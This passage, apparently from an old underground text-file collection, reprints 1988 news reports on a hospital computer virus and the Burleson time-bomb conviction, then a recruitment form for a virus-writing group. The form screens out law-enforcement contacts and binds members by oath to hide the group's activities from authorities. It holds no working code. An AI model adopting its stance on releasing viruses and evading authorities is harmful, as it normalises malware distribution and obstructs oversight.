from computer to computer. Some viruses do damage in the process, such as
destroying files or overloading computers.
Paul Pomes, a computer virus expert at the University of Illinois in
Champaign, said this was the first case he had heard of in which a virus had
disrupted a computer used for patient care or diagnosis in a hospital.
Such disruptions could become more common as personal computers are used
more widely in hospitals, Juni and Pomes said. More people know how to program
-- and therefore sabotage -- personal computers than the more specialized
computers that previously have been used, Pomes said.
The problem in Michigan surfaced when a computer used to display images
used to diagnose cancer and other diseases began to malfunction at the 250-bed
Troy hospital in August 1988.
In October, Juni discovered a virus in the computer in the Troy hospital.
The next day, Juni found the same virus in a similar computer in the 1,200-bed
Royal Oak facility, he said.
The virus apparently arrived in a program in a storage disk that was part
of the Troy computer system, he said. It probably was spread inadvertently to
the Royal Oak computer on a floppy disk used by a resident who worked at both
hospitals to write a research paper, he said.
The virus also spread to the desk-top computers at the University of
Michigan Medical Center in Ann Arbor, where it was discovered before it caused
problems.
"Prosecutor Wins Conviction In Computer Data Destruction"
September 21, 1988
Fort Worth, Texas (AP) - A former programmer has been convicted of planting
a computer "virus" in his employer's system that wiped out 168,000 records and
was activated like a time bomb, doing its damage two days after he was fired.
Tarrant County Assistant District Attorney Davis McCown said he believes he
is the first prosecutor in the country to have someone convicted for destroying
computer records using a "virus."
"We've had people stealing through computers, but not this type of case,"
McCown said. "The basis for this offense is deletion."
"It's very rare that the people who spread the viruses are caught," said
John McAfee, chairman of the Computer Virus Industry Association in Santa Clara,
which helps educate the public about viruses and find ways to fight them.
"This is absolutely the first time" for a conviction, McAfee said.
"In the past, prosecutors have stayed away from this kind of case because
they're too hard to prove," McCown said yesterday. "They have also been reluctant
because the victim doesn't want to let anyone know there has been a breach of
security."
Donald Gene Burleson, 40, was convicted of charges of harmful access to a
computer, a third-degree felony that carries up to 10 years in prison and up to
$5,000 in fines.
A key to the case was the fact that State District Judge John Bradshaw
allowed the computer program that deleted the files to be introduced as
evidence, McCown said. It would have been difficult to get a conviction
otherwise, he said.
The District Court jury deliberated six hours before bringing back the
first conviction under the state's 3-year-old computer sabotage law.
Burleson planted the virus in revenge for his firing from an insurance
company, McCown said.
Jurors were told during a technical and sometimes-complicated three-week
trial that Burleson planted a rogue program in the computer system used to store
records at USPA and IRA Co., a Fort Worth-based insurance and brokerage firm.
A virus is a computer program, often hidden in apparently normal computer
software, that instructs the computer to change or destroy information at a
given time or after a certain sequence of commands.
The virus, McCown said, was activated Sept. 21, 1985, two days after
Burleson was fired as a computer programmer, because of alleged personality
conflicts with other employees.
"There were a series of programs built into the system as early as Labor
Day (1985)," McCown said. "Once he got fired, those programs went off."
The virus was discovered two days later, after it had eliminated 168,00
payroll records, holding up company paychecks for more than a month. The virus
could have caused hundreds of thousands of dollars in damage to the system had
it continued, McCown said.
WEST COAST CORRUPTED ALLEGIANCE PRESENTS:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
>> CORRUPTED PROGRAMMING INTERNATIONAL <<
>> MEMBERSHIP APPLICATION <<
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(CPI is a sub-group of WCCA)
NOTE: The following information is of a totally confidential nature. We must
question you in depth and thoroughly so that our knowledge and idea
of you will be quite complete. Remember, it is the fate of our voting
members who will decide upon your membership, as the result of your
response to this questionnaire. Please answer the following completely
and to the best of your ability. Also note that we may decide to voice
validate you or gather any other information through other sources and
will discover if you have placed false or misleading information on
this application.
PERSONAL INFORMATION:
-----------------------------------------------------------------------------
Alias(es) You HAVE Used :
Alias(es) You Currently Use :
Your FULL REAL Name :
Your Voice Phone Number :(###)###-####
Your Data Phone Number :(###)###-####
Your Mailing Address :
Your City, State & Zip :
Your Age :
Occupation/Grade :
Place of Employment/School :
Work Phone Number :
Your Interests And Hobbies :
Are You IN ANY WAY Affiliated With ANY Governmental/Law Enforcement Agency?
If So, In What Way? (Such as FBI/Sheriff/Police/etc. YOU KNOW WHAT I MEAN)
:
:
Are You IN ANY WAY Affiliated With The Telephone Company Or Any Type Of Phone,
Data, Or Long Distance Type Of Company? If So, In What Way?
:
:
COMPUTER INFORMATION/EXPERIENCE
-----------------------------------------------------------------------------
Computer Experience (time) :
Modeming Experience (time) :
BBS's You Frequent (Name/#) :
Some Elite References :
Computers You Have Used :
Computer(s) You Are Using :
Computer You Prefer :
Languages You Have Tried :
Languages You Know Well :
Your Best Language :
Have You Ever Phreaked :
Do You Phreak Regularly :
Have You Ever Hacked :
Do You Hack Regularly :
Have You Ever Cracked :
Do You Crack Regularly :
Ever Made A Virus/Trojan :
Major Accomplishments :
:
INTERVIEW
-----------------------------------------------------------------------------
Answer In 4 Lines Or Less:
What do you think Corrupted Programming International is?
:
:
:
:
When did you first hear about CPI?
:
:
:
:
Why do you want to be a member of CPI?
:
:
:
:
Do you know any of the members of CPI? Can you name any of the founders of CPI?
:
:
:
:
Have you considered the distribution of Viruses/Trojans as a "crime"? Why
or why not? Have you ever considered the consequences that could result
from the acts of releasing a Virus/Trojan? (morally speaking?)
:
:
:
:
Have you written any text files? (On any underground type of subject)
:
:
:
:
Are you a member of any other group(s)? Can you name them and their HQ BBS?
:
:
:
:
What would you consider yourself if you were admitted into CPI, a programmer,
a phreaker, a distributor, an information gatherer, or a vegetable?
:
:
:
:
Why would you ever want to release or aid in releasing a potential virus/trojan
to the public?
:
:
:
:
Can you contribute to CPI? How?
:(do you have access to info concerning virus/trojans)
:(exceptional programmer?)
:(got connections?)
:(anything extraordinary?)
OATH
-----------------------------------------------------------------------------
Typing your name at the bottom of the following paragraph is the same as
signing your name on an official document.
authorities - As stated in the document below, the term authorities shall
be defined as any law enforcement agency or any agency that
is/may be affiliated with any law enforcement agency. Also,
this includes any company or agency or person which is/may
be involved with the telephone company or any telephone-type
of service(s).
I [your name here] do solemnly swear never to report neither to my peers nor
the authorities the actions and duties performed by this group, Corrupted
Programming International, on any account. Also, I realize that if I leave
CPI and am no longer a member of CPI, it is my duty, as signed below, to uphold
the greatest confidence of CPI's activities, and I agree that any information I
may report to any one or any thing CANNOT be used against CPI and its members
in a court of law. I fully understand that if I were to become affiliated with
the authorities that it would be my duty to remove myself from any membership
if my position presented itself as contradictory towards the group, CPI and its
members. I also comprehend that if I were to be confronted by the authorities,
it is my duty as a CPI member, as signed below, to never disclose or discuss
CPI's activities to them; however, if I do, I fully agree that the information
disclosed or discussed cannot then be used against CPI or any member(s) of CPI
in a court of law. I further agree that all the terms and restrictions as noted
above also correspond to the entire group of WCCA, West Coast Corrupted
Allegiance.
Typed:____________________
-----------------------------------------------------------------------------
.Answer Each Question To The Best And Fullest Of Your Ability.
-----------------------------------------------------------------------------
Upload ALL Applications To The WCCA Headquarters BBS
T H E A N D R O M E D A S T R A I N
Future WCCA Support BBS's Will Be Active - Applications May Be Turned In Then